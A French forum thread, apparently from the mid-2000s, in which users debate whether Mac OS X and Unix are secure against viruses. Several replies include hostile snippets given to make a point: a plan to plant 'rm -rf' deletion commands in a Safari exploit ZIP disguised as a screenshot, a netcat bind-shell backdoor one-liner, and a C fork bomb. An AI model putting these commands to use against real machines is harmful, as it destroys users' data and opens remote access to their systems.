OVH Cloud OVH Cloud

Virus/Mac : Encore un journaliste à l'oeuvre !

58 réponses
Avatar
Polux
Mort de rire à la lecture de cet article qui vient de paraitre :

http://www.silicon.fr/getarticle.asp?id=14000

Décidément le jour où l'on sera capable de greffer des neurones y aura
des gens à passer en priorité !

10 réponses

2 3 4 5 6
Avatar
filh
Olivier Goldberg wrote:

Là aussi, il est faut de dire que les produits Apple ne sont pas passés
au crible de la sécurité.
Pour preuve, on voit régulièrement passer des "alertes de sécurité"
concernant Mac OS X, publiées par des spécialistes en la matière et
rapidement répercutées partout. Puis corrigées dans une "mise à jour de
la sécurité".
Mais bon, ça reste plus rare que chez M$, me semble-t-il.


Certes, mais cela ne prouve pas vraiment que Mac OS X a passé l'épreuve
du feu...

Le pb est peut-être que les spécialistes de la sécu ne se sont pas plus
penchés sur MacOSX que les pirates..

FiLH


--
Le fondement du constat bourgeois, c'est le bon sens, c'est-à-dire
une vérité qui s'arrête sur l'ordre arbitraire de celui qui la parle.
Roland Barthes.
http://www.filh.org

Avatar
filh
Olivier Croquette wrote:

Frederic Bezies wrote:
Quel est le rapport?


Un unix est conçu avec une optique de sécurité dès le début.


Comme tout OS moderne. Et?


Des noms ?

Bon donc MacOSX est une base unix un truc moderne des années 70
UNix n'en parlons pas
Windows sur la techno NT qui est peut-être un des plus moderne
finalement...(quoi que... basé sur quoi NT ?)

FiLH
--
Le fondement du constat bourgeois, c'est le bon sens, c'est-à-dire
une vérité qui s'arrête sur l'ordre arbitraire de celui qui la parle.
Roland Barthes.
http://www.filh.org



Avatar
filh
Frederic Bezies wrote:


Frederic Bezies wrote:

Y a pas à dire, les journalistes informatiques, ils feraient bien de
prendre des cours d'informatiques, et déjà à savoir ce qu'est un unix ;)


Quel est le rapport?


Un unix est conçu avec une optique de sécurité dès le début.


Faut peut-être pas dire n'importe quoi. Unix d'origine est une passoire
montrueuse (nan il y avait des unices livrés avec des fichiers
host.equiv à + +).

Le modèle de sécurité unix de base n'est sécurisé que si l'utilisateur
n'est pas admin,ce qui n'est plus le cas actuellement. Le reste après
n'est qu'une suite de colmatages.

Sans parler des fichiers passwd qu'on a colmaté avec des shadow, des nis
non cryptées (avec bind broadcast au bon vieux temps), du file system
nfs et autres.

Bien entendu. Cependant, vu qu'un utilisateur classique ne peut planter
le système en entier.



main() {
while(1) fork() ;
}

Tiens mac os x est pas mal là, on a un ulimit bien foutu, mais j'en
connais certains qui s'écroulent là.

FiLH


FiLH

--
Le fondement du constat bourgeois, c'est le bon sens, c'est-à-dire
une vérité qui s'arrête sur l'ordre arbitraire de celui qui la parle.
Roland Barthes.
http://www.filh.org



Avatar
Olivier Croquette
Frederic Bezies wrote:
Bien entendu. Cependant, vu qu'un utilisateur classique ne peut
planter le système en entier.


Certes (tout comme sur Windows soit dit en passant).


Première nouvelle. Il faudrait déjà que l'accès aux répertoire système
soit plus limité et non caché.


De quoi tu parles là!?
Les répertoires c:windows & co ne sont pas modifiables par un
utilisateur normal sur une machine administrée de manière normale.


Oui, mais sur un unix, cela n'influe pas sur l'ensemble du système. Sauf
pour les imbéciles qui ne travaillent qu'en root.


Et alors!?

Qu'est-ce que ça peut me faire que mon système ne soit pas globalement
touché si tous mes documents sont volés (voire effacés), mes numéros de
compte, de carte bleue, mes mots de passe et mon carnet d'adresse dans
la nature, et que quand je suis loggé, mon ordi soit utilisé comme
passerelle pour d'autres attaques?

J'en attends des preuves plus solides que les "proof-of-concept"
récente, souvent incapable de foutre VRAIMENT la merde.


Ben écoute, c'est pas dur, tu télecharges le ZIP
http://www.heise.de/security/dienste/browsercheck/demos/safari/Heise.jpg.zip,
tu remplaces le script par:
rm -rf ~
rm -rf /Applications

te le mets en ligne, et tu mets le lien comme si de rien était sur des
sites Mac (genre, "j'ai un problème, voilà la capture d'écran")

Dans la semaine, je suis sûr qu'au moins plusieurs personnes perdent
toutes leurs données personnelles, et leur machine devient en partie
inutilisable si elles travaillent en admin.

Pour varier les plaisirs, tu peux aussi te permettre un petit "/bin/nc
-l -p 20000 | /bin/sh" histoire d'avoir un carrément une backdoor sur
leur système avec leur droits.

Il te faut quoi de plus pour considérer que ça "fout vraiment la merde"?

Bien entendu, c'est plus drôle de faire un vrai virus qui s'installe et
se reproduit, mais c'est juste une question d'implémentation, il n'y a
pas de difficulté technique particulière. Il suffit de s'inspirer des 20
dernières années de virus.


Il est vrai qu'il est plus grave de perdre les données utilisateurs que
de prendre le controle du système et de zombifier la machine...


1/ Ben oui, pour l'utilisateur lambda, c'est le cas. Ca t'étonne? Les
gens normalement constitués et égoistes préfèrent que leur machine
servent à un DDOS que de perdre toute leurs correspondances, photos, et
travaux. Et je les comprend.


2/ Prendre le contrôle d'un compte utilisateur est suffisant pour faire
la plupart des choses.

Les seules grosses différences sont que:

- l'attaquant ne peut pas mettre le système HS
- certaines choses ne sont pas possibles (sniffer...)
- un seul compte (utilisateur?) est compromis
- une ré-installation complète du système n'est pas nécessaire. Il
suffit de nettoyer le compte.


Mais par contre pas de problème pour:
- keyloggers
- vols de mot de passe et CB
- Spyware
- utilisation dans un réseau de zombie (pour DDOS ou rebond)
- serveur de fichiers illégaux

et j'en passe. Bref, tout ce qui pourrit la vie sur un ordinateur
aujourd'hui.



Avatar
Frederic Bezies

Frederic Bezies wrote:
Bien entendu. Cependant, vu qu'un utilisateur classique ne peut
planter le système en entier.


Certes (tout comme sur Windows soit dit en passant).


Première nouvelle. Il faudrait déjà que l'accès aux répertoire système
soit plus limité et non caché.


De quoi tu parles là!?
Les répertoires c:windows & co ne sont pas modifiables par un
utilisateur normal sur une machine administrée de manière normale.



Donc 1% des windows de la planète ? ;)


Oui, mais sur un unix, cela n'influe pas sur l'ensemble du système.
Sauf pour les imbéciles qui ne travaillent qu'en root.


Et alors!?


Gnnn ??????


Qu'est-ce que ça peut me faire que mon système ne soit pas globalement
touché si tous mes documents sont volés (voire effacés), mes numéros de
compte, de carte bleue, mes mots de passe et mon carnet d'adresse dans
la nature, et que quand je suis loggé, mon ordi soit utilisé comme
passerelle pour d'autres attaques?


Personnellement, je pense qu'il est plus intéressant de zombifier une
machine que de piquer des infos d'un utilisateur lambda.


J'en attends des preuves plus solides que les "proof-of-concept"
récente, souvent incapable de foutre VRAIMENT la merde.


Ben écoute, c'est pas dur, tu télecharges le ZIP
http://www.heise.de/security/dienste/browsercheck/demos/safari/Heise.jpg.zip,


Je l'ai téléchargé.

tu remplaces le script par:
rm -rf ~
rm -rf /Applications


Ayant un background linux, je ne taperais des commandes suicidaire.


te le mets en ligne, et tu mets le lien comme si de rien était sur des
sites Mac (genre, "j'ai un problème, voilà la capture d'écran")


Tu joues sur l'ingéniérie sociale ?


Dans la semaine, je suis sûr qu'au moins plusieurs personnes perdent
toutes leurs données personnelles, et leur machine devient en partie
inutilisable si elles travaillent en admin.


Admin != root.


Pour varier les plaisirs, tu peux aussi te permettre un petit "/bin/nc
-l -p 20000 | /bin/sh" histoire d'avoir un carrément une backdoor sur
leur système avec leur droits.


Et après ? Quel intérêt j'aurais de le faire ? Je ne travaille pas pour
Sony.


Il te faut quoi de plus pour considérer que ça "fout vraiment la merde"?



Une VRAIE merde, pas une simple "proof-of-concept". TROP DUR À
COMPRENDRE ? Où dois-je le traduire en chinois mandarin ?

Bien entendu, c'est plus drôle de faire un vrai virus qui s'installe et
se reproduit, mais c'est juste une question d'implémentation, il n'y a
pas de difficulté technique particulière. Il suffit de s'inspirer des 20
dernières années de virus.


Déjà, il faudrait que Leap.A fut bien codé pour se reproduire. Sur les
20 dernières années de virus, il faut bien voir la tendance prise depuis
environ 5-6 ans : la zombification et le spamming plus que la
destruction bête et méchante.


Il est vrai qu'il est plus grave de perdre les données utilisateurs
que de prendre le controle du système et de zombifier la machine...


1/ Ben oui, pour l'utilisateur lambda, c'est le cas. Ca t'étonne? Les
gens normalement constitués et égoistes préfèrent que leur machine
servent à un DDOS que de perdre toute leurs correspondances, photos, et
travaux. Et je les comprend.


Ils n'ont qu'à apprendre à faire des sauvegardes et être informé sur ce
qu'on appelle l'ingéniérie sociale => problème de formation à la base.


2/ Prendre le contrôle d'un compte utilisateur est suffisant pour faire
la plupart des choses.



La plupart ? Même zombifier une machine pour la transformer en robot à
spamming ?

Les seules grosses différences sont que:

- l'attaquant ne peut pas mettre le système HS


-> intérêt quasiment nul pour les casseurs/

- certaines choses ne sont pas possibles (sniffer...)


Tiens, c'est pas une des bases de certaines véroles à spam ?

- un seul compte (utilisateur?) est compromis


Dégats limités en effet.

- une ré-installation complète du système n'est pas nécessaire. Il
suffit de nettoyer le compte.



Contrairement à un Windows de base.


Mais par contre pas de problème pour:
- keyloggers
- vols de mot de passe et CB


Encore faut-il que les données soit encodées en clair.

- Spyware


Liste des spyware sous MacOS-X ? Mis à part les produits de Sony et des
éditeurs d'AV, j'en connais pas beaucoup sur cette plateforme.

- utilisation dans un réseau de zombie (pour DDOS ou rebond)


Et le spamming ?

- serveur de fichiers illégaux



Ah. Dans ce cas, il faut viser les machines à large bande passante.

et j'en passe. Bref, tout ce qui pourrit la vie sur un ordinateur
aujourd'hui.



Et principalement les utilisateurs de Windows mal formés à la base.

Car le vrai problème c'est l'ingéniérie sociale...




Avatar
Frederic Bezies

Olivier Croquette wrote:

Frederic Bezies wrote:
Quel est le rapport?
Un unix est conçu avec une optique de sécurité dès le début.

Comme tout OS moderne. Et?



Des noms ?

Bon donc MacOSX est une base unix un truc moderne des années 70
UNix n'en parlons pas


Unix existe depuis les années 1970, mais est moderne sur un plan : la
sécurité incrustée dans les concepts du système.

Windows sur la techno NT qui est peut-être un des plus moderne
finalement...(quoi que... basé sur quoi NT ?)


NT est à l'origine un dérivé d'un certain OS/2...


FiLH





Avatar
Frederic Bezies

Frederic Bezies wrote:


Frederic Bezies wrote:

Y a pas à dire, les journalistes informatiques, ils feraient bien de
prendre des cours d'informatiques, et déjà à savoir ce qu'est un unix ;)
Quel est le rapport?

Un unix est conçu avec une optique de sécurité dès le début.



Faut peut-être pas dire n'importe quoi. Unix d'origine est une passoire
montrueuse (nan il y avait des unices livrés avec des fichiers
host.equiv à + +).


D'origine, mais maintenant ?


Le modèle de sécurité unix de base n'est sécurisé que si l'utilisateur
n'est pas admin,ce qui n'est plus le cas actuellement. Le reste après
n'est qu'une suite de colmatages.


Admin ou root ? Car les distros linux MODERNES ET INTELLIGENTES font
tout pour limiter l'accès au root, via le biais de sudo.


Sans parler des fichiers passwd qu'on a colmaté avec des shadow, des nis
non cryptées (avec bind broadcast au bon vieux temps), du file system
nfs et autres.


D'accord, mais de nos jours ?


Bien entendu. Cependant, vu qu'un utilisateur classique ne peut planter
le système en entier.


main() {
while(1) fork() ;
}


La bonne vieille bombe fork et après ?


Tiens mac os x est pas mal là, on a un ulimit bien foutu, mais j'en
connais certains qui s'écroulent là.



Des noms ? Mandriva par exemple ? ;)




Avatar
Olivier Croquette
Frederic Bezies wrote:

Il te faut quoi de plus pour considérer que ça "fout vraiment la merde"?



Une VRAIE merde, pas une simple "proof-of-concept". TROP DUR À
COMPRENDRE ?


OK, donc pour conclure on est d'accord apparemment:

- ton point de vue et qu'il n'y a rien de concret aujourd'hui pour
"foutre la merde" sur MacOS X

- mon point de vue et celui de l'article est que techniquement, les
programmes malsains sont possible sur MacOS X. Les failles récentes
pourraient aller dans ce sens.

Quand à savoir quand et comment cela arrivera, et quelles conséquences
cela aura, je n'en sais rien.

En tant qu'utilisateur, j'espère bien qu'il n'y aura jamais ni spyware,
virus ou autres sur MacOS X. Mais je ne me fais pas non plus trop
d'illusions.


Avatar
filh
Frederic Bezies wrote:


Frederic Bezies wrote:


Frederic Bezies wrote:

Y a pas à dire, les journalistes informatiques, ils feraient bien de
prendre des cours d'informatiques, et déjà à savoir ce qu'est un unix ;)
Quel est le rapport?

Un unix est conçu avec une optique de sécurité dès le début.



Faut peut-être pas dire n'importe quoi. Unix d'origine est une passoire
montrueuse (nan il y avait des unices livrés avec des fichiers
host.equiv à + +).


D'origine, mais maintenant ?


Ben c'est toi qui parlait de « conçu ». Donc je répond : à sa
conception, unix ne fut pas conçu avec une optique de sécurité.

Le modèle de sécurité unix de base n'est sécurisé que si l'utilisateur
n'est pas admin,ce qui n'est plus le cas actuellement. Le reste après
n'est qu'une suite de colmatages.


Admin ou root ? Car les distros linux MODERNES ET INTELLIGENTES font
tout pour limiter l'accès au root, via le biais de sudo.


Aucun rapport. Le modèle de sécurité de base unix est de faire confiance
au client.


Sans parler des fichiers passwd qu'on a colmaté avec des shadow, des nis
non cryptées (avec bind broadcast au bon vieux temps), du file system
nfs et autres.


D'accord, mais de nos jours ?


Nfs marche très bien merci... les nis tournent encore (non on n'a pas
forcément vraiment besoin de passer en ldap)

Bien entendu. Cependant, vu qu'un utilisateur classique ne peut planter
le système en entier.


main() {
while(1) fork() ;
}


La bonne vieille bombe fork et après ?


Ben elle dit simplement le contraire de l'affirmation précédente. Un
utilisateur peut faire tomber une machine. (enfin 100 process en train
de faire un while(1) ; ça peut faire un bon petit DOS).


Tiens mac os x est pas mal là, on a un ulimit bien foutu, mais j'en
connais certains qui s'écroulent là.



Des noms ? Mandriva par exemple ? ;)


Solaris. Par exemple. (enfin bon sur ma station sun, un ulimit à 100
process par user je meurs !

Il est effectif qu'on sécurise de plus en plus et que maintenant on sait
faire entrer des nunux avec des utilisateurs root sur des machines mais
c'est pas forcément top (c'est moins simple de leur exporter quelque
tera de donneés en nfs).

FiLH


--
Le fondement du constat bourgeois, c'est le bon sens, c'est-à-dire
une vérité qui s'arrête sur l'ordre arbitraire de celui qui la parle.
Roland Barthes.
http://www.filh.org





Avatar
filh
Olivier Croquette wrote:

Frederic Bezies wrote:


Quand à savoir quand et comment cela arrivera, et quelles conséquences
cela aura, je n'en sais rien.

En tant qu'utilisateur, j'espère bien qu'il n'y aura jamais ni spyware,
virus ou autres sur MacOS X. Mais je ne me fais pas non plus trop
d'illusions.


Si c'est un rootkit façon linux ça sera amusant... ils sont de plus en
plus vicieux et furtifs.

FiLH

--
Le fondement du constat bourgeois, c'est le bon sens, c'est-à-dire
une vérité qui s'arrête sur l'ordre arbitraire de celui qui la parle.
Roland Barthes.
http://www.filh.org

2 3 4 5 6